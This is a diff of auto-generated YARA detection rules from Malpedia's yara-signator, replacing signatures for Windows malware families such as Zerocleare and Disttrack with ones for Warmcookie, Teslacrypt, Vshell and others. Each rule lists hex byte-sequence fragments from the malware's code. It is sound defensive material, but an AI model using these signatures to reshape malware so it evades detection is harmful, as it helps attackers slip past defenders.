-		$sequence_6 = { 8b4c3138 33db 895de8 885def 8975e0 85c9 }
-		$sequence_7 = { 50 ffd2 ff15???????? 8a857bffffff 8b4df4 }
-		$sequence_8 = { 8b08 8b5108 50 ffd2 8b8568ffffff 8b08 }
-		$sequence_9 = { c645fc01 e8???????? 8b10 8b4a04 03c8 }
-		$sequence_10 = { 807def00 8b5de8 7503 83cb02 8b16 8b4a04 }
-		$sequence_11 = { 8bcf e8???????? 8b0e 8b5104 8b443238 }
-		$sequence_12 = { 8906 894604 894608 8945fc 56 c745f001000000 }
-		$sequence_13 = { 8bfe 80ea04 b904000000 eb23 }
-		$sequence_14 = { 397e14 7214 8a1402 8b3e 2ad1 }
-		$sequence_15 = { 7204 8b3e eb02 8bfe 8a1402 2ad1 80ea13 }
-		$sequence_16 = { 51 e8???????? 83c408 8bf0 6a0a }
-		$sequence_17 = { 50 e8???????? 83c40c 8d8de8fdffff 51 53 }
-		$sequence_18 = { 50 8bce c60600 e8???????? 8b5610 33c9 }
-		$sequence_19 = { 8d8de8fdffff 51 53 53 6a28 53 }
-		$sequence_20 = { 33c9 881407 bf10000000 40 3b4610 }
-		$sequence_21 = { c0ea02 8ac4 80e20f c0e004 }
-		$sequence_22 = { 8b07 eb02 8bc7 8b4de0 }
-		$sequence_23 = { c645fc07 e8???????? 8bf0 891f 6a08 c645fc0c e8???????? }
-		$sequence_24 = { 8b4c1938 895dd4 85c9 7405 8b01 ff5004 c745fc00000000 }
-		$sequence_25 = { 25ff000000 83c001 25fe010000 f20f593c85c0014600 660f122c85c0014600 }
-		$sequence_26 = { c70424???????? e8???????? 85c0 7424 c70424f4010000 e8???????? 83ec04 }
-		$sequence_27 = { 8b5508 83e23f 6bd230 8b0c8d00b04600 88441128 e9???????? 8b5508 }
-		$sequence_28 = { c74410e05c584600 8b42e0 8b4804 8d41e8 894411dc c745fc00000000 }
-		$sequence_29 = { 33f6 bf???????? 833cf584fe420001 751d 8d04f580fe4200 }
-		$sequence_30 = { 0f1000 0f1105???????? f30f7e4010 660fd605???????? e8???????? 8d8590bcf0ff }
-		$sequence_31 = { 0bc8 51 e8???????? 83c404 8d8dd4efffff 83bde8efffff10 }
-		$sequence_32 = { 83e3fc ba00000000 898c15a4feffff 83c204 }
-		$sequence_33 = { 01c8 0fb600 38c2 7410 c745e401000000 c745e000000000 eb18 }
-		$sequence_34 = { 8d8588feffff 890424 e8???????? 8d85bafeffff }
-		$sequence_35 = { c1fe05 c1e106 030cb5a0244300 eb02 8bca f641247f 759c }
-		$sequence_36 = { 39e8 741e c74424045c000000 893c24 }
-		$sequence_37 = { c78534ffffff00000000 6a00 50 e8???????? 83c404 8d8d38ffffff e8???????? }
-		$sequence_38 = { 3d04010000 7607 b801000000 eb33 c744240404010000 }
-		$sequence_39 = { 57 33ff ffb744fe4200 ff15???????? }
-		$sequence_40 = { 89e5 83ec28 c745eb00000000 c645ef00 c745f400000000 }
-		$sequence_41 = { 6a40 6a00 8d8590fcffff 50 e8???????? 83c40c }
-		$sequence_42 = { f3ab 8d4dfb e8???????? 8d4dfb e8???????? }
-		$sequence_43 = { 83f809 7d10 40 ba???????? 50 e8???????? }
-		$sequence_44 = { 8bec 8b4508 ff34c580fe4200 ff15???????? }
-		$sequence_45 = { ff15???????? 8d8d90bcf0ff e8???????? 8bf0 c645fc03 }
-		$sequence_46 = { 64a300000000 8b7510 56 ff15???????? 85c0 0f84cb010000 }
-		$sequence_47 = { 83e13f 6bd130 8b048500b04600 807c102900 7536 8b4d0c 3b4d14 }
-		$sequence_48 = { 8b45ec 3b45e0 7517 8b4508 0345e0 894508 }
-		$sequence_49 = { 8bf4 8b8578fcffff 50 ff15???????? 3bf4 e8???????? 8bf4 }
-		$sequence_50 = { 8b4d10 394de0 7752 037de0 8b45f0 8b55e8 8b048560cb4300 }
-		$sequence_51 = { 6a01 e8???????? ebd7 85ff }
-		$sequence_52 = { 3c5a 770f 0fbec1 0fb680d0ed4200 83e00f eb02 33c0 }
-		$sequence_53 = { e8???????? 85c0 756f 8b8328020000 }
-		$sequence_54 = { 898584fbffff 8d85e8fdffff 6808020000 50 }
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 7428 a1???????? 8d8c2478020000 50 68???????? 68???????? }
+		$sequence_1 = { 83fe06 0f8f1f010000 83fe03 0f8e16010000 8b4508 803805 0f850a010000 }
+		$sequence_2 = { 81ec00040000 53 56 6888030000 33db }
+		$sequence_3 = { 8b8680030000 8d542414 52 03c7 6800400000 50 53 }
+		$sequence_4 = { 68???????? 8bce e8???????? 89b5b0f3ffff 89b5b4f3ffff 85f6 7410 }
+		$sequence_5 = { 8944242c 8d542430 89442430 51 89442438 52 89442440 }
+		$sequence_6 = { 50 68???????? 6a10 68???????? ffd3 }
+		$sequence_7 = { f3a4 8dbdccfdffff 83c9ff 33c0 f2ae f7d1 49 }
+		$sequence_8 = { 8b5508 8b420c 85c0 740f 8985c8f6ffff 50 }
+		$sequence_9 = { f3a4 b900010000 8dbc2470020000 f3ab }
 
 	condition:
-		7 of them and filesize < 1097728
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Zerocleare_Auto : FILE
+rule MALPEDIA_Win_Helauto_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "44db0221-dc66-5a41-bbf8-146a25155baf"
+		id = "b795cd97-f81e-5b0c-b86f-eb6142e4a506"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zerocleare_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.helauto_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "e4821dd22695093410a23835df9e39372b43fe15a2de70debfb45b9cb2592dab"
+		logic_hash = "77b1dbe0537fbb57df2196994395215daf625d1b39e62bbfe2e9527b9343a123"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112568,34 +112572,34 @@ rule MALPEDIA_Win_Zerocleare_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d45d0 837de408 68???????? 0f4345d0 68000000c0 50 e8???????? }
-		$sequence_1 = { ff249d01c04000 8b46e4 3b42e4 744f 0fb6f8 0fb642e4 2bf8 }
-		$sequence_2 = { 8b049d40fd4400 f644082801 7469 56 }
-		$sequence_3 = { 8b0cb540fd4400 83c410 8985f4efffff 8bc2 8b95f4efffff }
-		$sequence_4 = { 6a05 e8???????? 83c404 6a00 ff74f704 ff34f7 }
-		$sequence_5 = { 56 8b7508 ff34b5109f4300 e8???????? 50 ff34b52c9f4300 8d4dec }
-		$sequence_6 = { 7cde 68???????? e8???????? 8b8504f8ffff }
-		$sequence_7 = { 83c404 89460c 83fa08 722e }
-		$sequence_8 = { 833d????????00 0f852ce4ffff 8d0dc0524400 ba1b000000 e9???????? a900000080 }
-		$sequence_9 = { c7401000000000 c7401407000000 668908 c645fc04 8b9530f7ffff 83fa08 727f }
+		$sequence_0 = { 33c0 8d7dc0 895dbc f3ab 8b4510 69c0f4010000 }
+		$sequence_1 = { 753b 6a08 be???????? 59 8d7d98 f3a5 }
+		$sequence_2 = { ff75f0 ff15???????? 8b45f4 8b7dec 2b4510 }
+		$sequence_3 = { 68???????? 8d85a8f9ffff 50 e8???????? 8d85a8f9ffff }
+		$sequence_4 = { 53 8d85a8f8ffff 68???????? 50 e8???????? }
+		$sequence_5 = { 50 6a1f ff75fc ffd6 8d45c8 57 50 }
+		$sequence_6 = { 53 53 6a01 53 8d8528feffff 53 }
+		$sequence_7 = { 59 0f85b3000000 53 6a08 }
+		$sequence_8 = { 6a01 58 c20c00 b8???????? e8???????? 81ec00010000 }
+		$sequence_9 = { 6a1f ff75fc 897dc4 ff15???????? 8b35???????? 804ddd01 }
 
 	condition:
-		7 of them and filesize < 42670080
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Revenant_Auto : FILE
+rule MALPEDIA_Win_Warmcookie_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d3da3715-670e-5d1a-8c9a-150b3eadfd7c"
+		id = "0026322f-2256-5880-b6f0-ee27db7c6e54"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenant"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.revenant_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.warmcookie"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.warmcookie_auto.yar#L1-L234"
 		license_url = "N/A"
-		logic_hash = "bc25d04495c8de2d240671fc2471b933071b7fc14621d4283ee86183238cabeb"
+		logic_hash = "f9b50e12d5d001e33fbadd9cf4f5cbc2e73544c65bdcaaf5cab4e22fb22bdceb"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -112607,32 +112611,47 @@ rule MALPEDIA_Win_Revenant_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 41803c1c20 488d4301 7405 4889c3 ebeb 8d4b01 }
-		$sequence_1 = { 7592 41c744240801000000 b801000000 4881c458010000 }
-		$sequence_2 = { 31c9 488b2d???????? 4989f0 ffd5 4c8b35???????? 85c0 7521 }
-		$sequence_3 = { 488b542420 e8???????? 4c8b442428 31d2 488b4c2420 e8???????? }
-		$sequence_4 = { e8???????? 4885c0 4889c6 7465 }
-		$sequence_5 = { 4531c9 440fb74738 488b4c2448 e8???????? 4885c0 }
-		$sequence_6 = { f3a4 488b7c2438 8b4c2448 f3aa }
-		$sequence_7 = { 4889f1 ff15???????? b940000000 89c5 4889ea }
-		$sequence_8 = { ff15???????? 488d0dc82d0000 31f6 89c2 e8???????? e9???????? 837f3c00 }
-		$sequence_9 = { 89c5 4889ea 896c244c ff15???????? 448b44244c }
+		$sequence_0 = { 41b900000000 41b807000000 ba00000080 4889c1 }
+		$sequence_1 = { 48c744243800000000 c744243000000000 c744242803000000 48c744242000000000 41b900000000 }
+		$sequence_2 = { 41be01000000 4d85d2 0f8489010000 418b02 85c0 0f88c0060000 8d0480 }
+		$sequence_3 = { 4183fe03 0f87ff050000 4585f6 0f850a020000 41be01000000 4d85d2 }
+		$sequence_4 = { 41b902000000 41b800000000 ba00000000 4889c1 }
+		$sequence_5 = { 48896c2470 8944242c 48b8fffffffffdffffff 4889842480000000 31c0 6689842488000000 }
+		$sequence_6 = { 448b44244c 4989c4 4181f80080ffff 7470 }
+		$sequence_7 = { 4883c468 5b 415c c3 55 }
+		$sequence_8 = { 4181f80080ffff 7470 8b4c2448 4889c2 4989d9 e8???????? }
+		$sequence_9 = { 8b530c 85d2 0f8e1bffffff 01d0 89430c e9???????? 4157 }
+		$sequence_10 = { 4883ec28 e8???????? 3dff2f0000 0f97c0 }
+		$sequence_11 = { ba19000000 488b4c2438 ff15???????? 85c0 }
+		$sequence_12 = { ba18000000 4889c1 ffd3 85c0 }
+		$sequence_13 = { 85c0 7409 488b442428 48c1e814 }
+		$sequence_14 = { 488b01 ff9080000000 85c0 7815 }
+		$sequence_15 = { ff15???????? 25ff0f0000 8d88b80b0000 ff15???????? }
+		$sequence_16 = { 488b01 ff5010 ff15???????? 89f0 4883c458 }
+		$sequence_17 = { 8d8800040000 e8???????? 4889c3 4885c0 }
+		$sequence_18 = { 0fb6d1 488b0b ff15???????? 8b38 488bcb e8???????? 488b4c2448 }
+		$sequence_19 = { 85c0 7432 488d0c7d02000000 e8???????? 488bd8 4885c0 }
+		$sequence_20 = { 48ffc7 66393478 75f7 4885ff 740d 488d4c2420 }
+		$sequence_21 = { 440fb64101 410fb6540902 410fb6440802 4188440902 4188540802 0fb601 }
+		$sequence_22 = { 488bce e8???????? 488b7c2468 8bc3 }
+		$sequence_23 = { 4c8bc6 6683f822 744f 48ffc1 664289440420 }
+		$sequence_24 = { 488d542470 b901010000 ff15???????? 85c0 }
 
 	condition:
-		7 of them and filesize < 99328
+		7 of them and filesize < 331776
 }
-rule MALPEDIA_Win_Sparrow_Door_Auto : FILE
+rule MALPEDIA_Win_Computrace_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "91053f9d-da7f-5861-a669-343fc4d9f35e"
+		id = "d022645b-4eeb-5507-b4bf-b64f930ec84b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sparrow_door"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sparrow_door_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.computrace_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "c57cb5bf7003c0c8f6009858f16b398bf1f07f6fd24e51a6f375d303f48a1e92"
+		logic_hash = "f20f4a4bfb7063221bca96073a60966b690b58a18a5add0eb3048df505777fc6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112646,32 +112665,32 @@ rule MALPEDIA_Win_Sparrow_Door_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4c242c 33ed 03e8 13cb }
-		$sequence_1 = { ffd7 8b1d???????? 50 ffd3 3bc5 740c }
-		$sequence_2 = { 53 51 885c241c e8???????? 83c40c 6882050000 8d542454 }
-		$sequence_3 = { 83c414 8d542450 52 57 ff15???????? 85c0 0f8599feffff }
-		$sequence_4 = { 50 c684242401000000 e8???????? 68f3010000 8d8c241d030000 56 }
-		$sequence_5 = { 85c0 743c 8b442418 8d4c2414 51 6a0b }
-		$sequence_6 = { 53 55 8b6c240c 57 6a00 6880000000 6a03 }
-		$sequence_7 = { 8b35???????? ffd6 8b0d???????? 6a64 }
-		$sequence_8 = { 837c242064 0f8d58010000 d16c241c 7508 }
-		$sequence_9 = { 68ff1f0000 8d8c24c9000000 6a00 51 895c241c }
+		$sequence_0 = { 8b4628 8d5508 6a04 52 56 ffd0 }
+		$sequence_1 = { 7469 c7466c01000000 834e70ff 804e5c04 ff15???????? }
+		$sequence_2 = { 2bc7 7417 48 740f 48 }
+		$sequence_3 = { 8d442404 50 6a01 6a00 6a03 ff15???????? c20400 }
+		$sequence_4 = { 894c862c 8935???????? 5e 8bc3 5b }
+		$sequence_5 = { 3b0f 7cd3 c60600 2b750c 8937 5f 5e }
+		$sequence_6 = { 8845f3 33ff 397d14 7e1a }
+		$sequence_7 = { 56 8b35???????? 57 8b7d08 8d85f8feffff 50 }
+		$sequence_8 = { 7305 6681f22110 fecd 75f2 }
+		$sequence_9 = { ffb6401b0000 ff15???????? 8d86301b0000 50 8d45e4 50 }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Squirrelwaffle_Auto : FILE
+rule MALPEDIA_Win_Teslacrypt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "870824b4-58bb-571d-92bf-60311c954be1"
+		id = "9b939144-964e-5aba-aac8-37aa145cbdf7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.squirrelwaffle_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.teslacrypt_auto.yar#L1-L176"
 		license_url = "N/A"
-		logic_hash = "ca7cf3c3a665a3fb39ef07c14cbbf782e38d67a5236157091e835f3cda65f067"
+		logic_hash = "de3676df661439e8c55092a036c1132b34328a8e3d35af949d4b63145f8cc259"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112685,34 +112704,40 @@ rule MALPEDIA_Win_Squirrelwaffle_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f44ca 51 e8???????? 8b8690010000 47 }
-		$sequence_1 = { c645fc03 8d55cc 837de010 8b4b10 }
-		$sequence_2 = { 83c408 68???????? 6a14 6a18 }
-		$sequence_3 = { 40 84c9 75f9 2bc7 8d4db8 50 }
-		$sequence_4 = { 50 52 e8???????? 83c40c 8d7b40 ff734c ff15???????? }
-		$sequence_5 = { 8d45ed c7855cf7ffff00000000 c78560f7ffff0f000000 c6854cf7ffff00 3bf0 740f 2bc6 }
-		$sequence_6 = { 0f46c2 50 e8???????? 83c404 85c0 0f848c000000 8d7023 }
-		$sequence_7 = { 2bc2 3bc1 0f82d4000000 837f1410 7202 }
-		$sequence_8 = { 50 8b4508 50 03c1 }
-		$sequence_9 = { 837de010 8b4b10 8b75cc 0f43d6 }
+		$sequence_0 = { 31f7 897d04 31f9 894d08 }
+		$sequence_1 = { 31f7 89bdc4000000 31f9 898dc8000000 31ca 8995cc000000 89d0 }
+		$sequence_2 = { 31f9 894d08 31ca 89550c 89d0 }
+		$sequence_3 = { 33451c 89453c 51 52 89f2 c1c808 0fb6c8 }
+		$sequence_4 = { 31f7 89bda4000000 31f9 898da8000000 31ca 8995ac000000 89d0 }
+		$sequence_5 = { 3345f4 894514 3345f8 894518 3345fc 89451c 51 }
+		$sequence_6 = { 335d04 334d08 33550c 81ffa0000000 0f8452030000 81ffc0000000 0f84ac010000 }
+		$sequence_7 = { 334500 335d04 8b6c2418 894500 895d04 897508 897d0c }
+		$sequence_8 = { 83fa00 89442418 894c2414 89542410 7d23 8b442410 }
+		$sequence_9 = { 8b54244c 8916 c7460804000000 89442448 ffd1 83ec10 8b4c2448 }
+		$sequence_10 = { 8b442438 c70001000000 8b442428 c70002000000 }
+		$sequence_11 = { 894c243c 74b0 e8???????? 89e1 8901 c74104???????? e8???????? }
+		$sequence_12 = { 8b4c2460 ffd1 83ec08 8944240c }
+		$sequence_13 = { 8b4c2434 8b11 8b742438 29d6 8b7c243c }
+		$sequence_14 = { e8???????? 31c9 89c2 83c218 }
+		$sequence_15 = { 89442408 885c2407 88742406 7428 8b442408 83c001 }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 1187840
 }
-rule MALPEDIA_Win_Disttrack_Auto : FILE
+rule MALPEDIA_Win_Unidentified_071_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "656ce2d7-e23b-52b7-a17b-bd1f83c468f3"
+		id = "cfbea96e-4359-5ae7-941b-244ed79d12c2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.disttrack_auto.yar#L1-L269"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_071"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_071_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "1a87cbbf3cac3bb5395930782b27d52657176f4eea6766d20ecb09a08d9650c6"
+		logic_hash = "2aec891397e4f33ea521c1dfdd2bf39deb44b46ee917346f946ae37d0a5d367f"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -112724,49 +112749,32 @@ rule MALPEDIA_Win_Disttrack_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 6a00 6a00 6848000700 }
-		$sequence_1 = { e8???????? 83c404 50 e8???????? 83c404 68???????? ff15???????? }
-		$sequence_2 = { 53 ff15???????? 5d 5b 8bc7 5f 5e }
-		$sequence_3 = { ff15???????? 8d45dc 50 ff15???????? 8b4ddc }
-		$sequence_4 = { 57 e8???????? 6a07 e8???????? 59 c3 6a10 }
-		$sequence_5 = { 8b4204 8d8c24a4000000 894c2420 c7440434fcc24100 8d4c244c }
-		$sequence_6 = { ff15???????? 85c0 7406 8b4df0 51 ffd0 83ffff }
-		$sequence_7 = { 0f85a5000000 33d2 488d4c2470 448d4268 }
-		$sequence_8 = { 83c1ff 898d14f8ffff 8b9514f8ffff 8a4201 888513f8ffff }
-		$sequence_9 = { 48397d10 7430 488b4c2430 e8???????? 4c8bc0 488b542430 }
-		$sequence_10 = { 740c 837d1800 7406 837d1c00 751f }
-		$sequence_11 = { 8d8424fc000000 50 8d4c2450 e8???????? }
-		$sequence_12 = { 0f87260a0000 ff248597fa4000 33c0 838df4fbffffff }
-		$sequence_13 = { 32040e 6a00 8d55f0 52 }
-		$sequence_14 = { 85c0 750e 80fb2b 7409 80fb2f 0f858c000000 }
-		$sequence_15 = { 488d9c1de0010000 448be6 48895c2428 4963cc }
-		$sequence_16 = { e8???????? 85c0 75de 488bcb ff15???????? 33c0 488b8c2460020000 }
-		$sequence_17 = { 83c804 48397948 0f44d0 eb0e 488b4148 48f7d8 1bd2 }
-		$sequence_18 = { e8???????? 68???????? 8d4df4 51 c745f408f34100 e8???????? }
-		$sequence_19 = { 85c0 751a 488d156cb10000 41b810200100 488bcd e8???????? }
-		$sequence_20 = { c1fe05 c1e106 030cb540174200 eb02 8bca f641247f 759b }
-		$sequence_21 = { 33f6 56 51 50 52 e8???????? 8945b8 }
-		$sequence_22 = { c745fc00000000 e8???????? c745fcffffffff 8b5790 8b4204 c7443890b4c24100 }
-		$sequence_23 = { 8d5c0002 e8???????? 488d542430 448bd8 }
-		$sequence_24 = { 8b0c8d40174200 83e61f c1e606 89040e 8b45f8 e9???????? }
-		$sequence_25 = { e8???????? 408ac7 488b8d80020000 4833cc e8???????? 4c8d9c2490030000 498b5b10 }
-		$sequence_26 = { 8b149540174200 59 c1e006 59 8a4dff 80c901 884c0204 }
+		$sequence_0 = { 837c241002 740b 837c241003 7504 6a0b }
+		$sequence_1 = { a1???????? 0d00020000 a3???????? e8???????? }
+		$sequence_2 = { 56 55 e8???????? 8d4701 89742420 }
+		$sequence_3 = { c1e902 57 33ff 3b550c 0f47c8 85c9 7413 }
+		$sequence_4 = { 53 56 57 e8???????? 83c418 eb10 83f802 }
+		$sequence_5 = { 3bf3 7408 53 8bce e8???????? 83ed10 83eb10 }
+		$sequence_6 = { 0faf05???????? 53 56 8b35???????? }
+		$sequence_7 = { 8bec 8b550c 8b4d10 8b4214 2b4210 394110 7615 }
+		$sequence_8 = { c21000 e8???????? cc 8b442408 56 8b742408 }
+		$sequence_9 = { a3???????? a1???????? 83e040 59 a3???????? }
 
 	condition:
-		7 of them and filesize < 1112064
+		7 of them and filesize < 1220608
 }
-rule MALPEDIA_Win_Polpo_Auto : FILE
+rule MALPEDIA_Win_Chir_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4ff250ea-14e5-5ddf-884d-81a7a2123b4c"
+		id = "78bff571-2d0f-563f-8afb-2fed2637cee4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polpo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.polpo_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chir"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chir_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "c5c58623683189d984bf95794fae6745283628eb524957fe3fb712a317c0fbc7"
+		logic_hash = "13fbf415f29c525be8d7104bf47ab4cf9292f1187b96643f7c39e370c88f7e8f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112780,32 +112788,32 @@ rule MALPEDIA_Win_Polpo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 66895004 8a0d???????? 884806 8b45b4 8bf0 8da42400000000 8a08 }
-		$sequence_1 = { f3a5 8bc8 83e103 f3a4 8d45dc }
-		$sequence_2 = { 3acb 75f9 2bc6 8dbd4cf7ffff 4f 8a4f01 47 }
-		$sequence_3 = { 8bc8 c1e902 f3a5 8bc8 83e103 837d0c00 }
-		$sequence_4 = { 6a00 52 898df4faffff e8???????? b908000000 }
-		$sequence_5 = { 2bfe 8d9b00000000 8b1437 8b4c3708 }
-		$sequence_6 = { 33cd e8???????? 8be5 5d c20800 81ff00001000 0f8387000000 }
-		$sequence_7 = { 85c0 753e 6a02 56 }
-		$sequence_8 = { 83e03f 0fb680c0940120 83e23f 41 884602 8a92c0940120 885603 }
-		$sequence_9 = { 8985edfeffff 668985f1feffff 8885f3feffff 8845ec 8945ed 8945f1 }
+		$sequence_0 = { 50 c745f840214125 c745fc32212400 e8???????? }
+		$sequence_1 = { 48 59 8bfb 7419 }
+		$sequence_2 = { 8d45f0 50 c745f021352432 c745f451173300 e8???????? 48 }
+		$sequence_3 = { 8d4c15f8 8a19 80f3fc 80c302 80f301 80c303 }
+		$sequence_4 = { 8d45f4 50 c745f421352432 c745f851173300 e8???????? }
+		$sequence_5 = { 740b 48 8906 66837c47fe5c }
+		$sequence_6 = { c745f451173300 e8???????? 48 59 8bfb }
+		$sequence_7 = { 7415 8d4c15f8 8a01 34fc 0402 3401 0403 }
+		$sequence_8 = { 42 8801 3bd7 72eb }
+		$sequence_9 = { 8d45f4 50 c745f421352432 c745f851173300 }
 
 	condition:
-		7 of them and filesize < 250880
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Vermilion_Strike_Auto : FILE
+rule MALPEDIA_Win_Vshell_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cccdd0ef-85fa-55e7-a474-5f9b069a3146"
+		id = "9d00442f-4008-5c2c-a89f-67c6ad34a468"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermilion_strike"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vermilion_strike_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vshell"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vshell_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "fbc14feb8d48b183ee7897af8bb71c1d6c19913a32cffa9f35df20729fb944fd"
+		logic_hash = "af7100cec7361ef2656c4b43a7045079d3f82b2662234a4759041cc9664982f0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112819,32 +112827,32 @@ rule MALPEDIA_Win_Vermilion_Strike_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c414 51 52 b330 8d7c2438 }
-		$sequence_1 = { 8d4e20 51 c744241400000000 e8???????? c7463c00000000 8bc6 8b4c2408 }
-		$sequence_2 = { c644241400 8d7001 8d9b00000000 8a10 40 84d2 }
-		$sequence_3 = { 83c404 56 8bd8 6a00 53 895c2418 e8???????? }
-		$sequence_4 = { 3dea000000 7518 8b74241c 85f6 7410 8d442464 }
-		$sequence_5 = { ffd7 8bf0 83feff 7532 ffd5 }
-		$sequence_6 = { 895c2448 885c2438 39bc2484000000 720d 8b542470 }
-		$sequence_7 = { 396e18 7205 8b4e04 eb03 8d4e04 50 51 }
-		$sequence_8 = { e8???????? 57 50 8d7c245c c684245801000003 e8???????? 83c40c }
-		$sequence_9 = { eb02 8bc7 3bc3 7711 83f908 }
+		$sequence_0 = { e8???????? 90 bf01000000 90 e8???????? 488b942480000000 48894a70 }
+		$sequence_1 = { eb50 488b842498000000 48c740280b000000 eb3e 488b842428010000 488b9c2430010000 e8???????? }
+		$sequence_2 = { e8???????? 48c70019000000 e8???????? 4889c1 4889df 488d05419d5d00 488b9c2490000000 }
+		$sequence_3 = { eb1b 440fb64c3c27 418d3431 8d76cd 4088741427 4488443c27 4883c002 }
+		$sequence_4 = { eb38 488b8c2488000000 488b4110 e8???????? 4889c3 488d053d4ca100 488b6c2478 }
+		$sequence_5 = { eba7 4885c9 741c 48894c2440 48899c2498000000 31c0 31d2 }
+		$sequence_6 = { e8???????? e8???????? 4889842478040000 e8???????? 4889842470040000 48899c24d8010000 e8???????? }
+		$sequence_7 = { eb0c 488d3da654b000 e8???????? 4885db 7410 4889d8 4889cb }
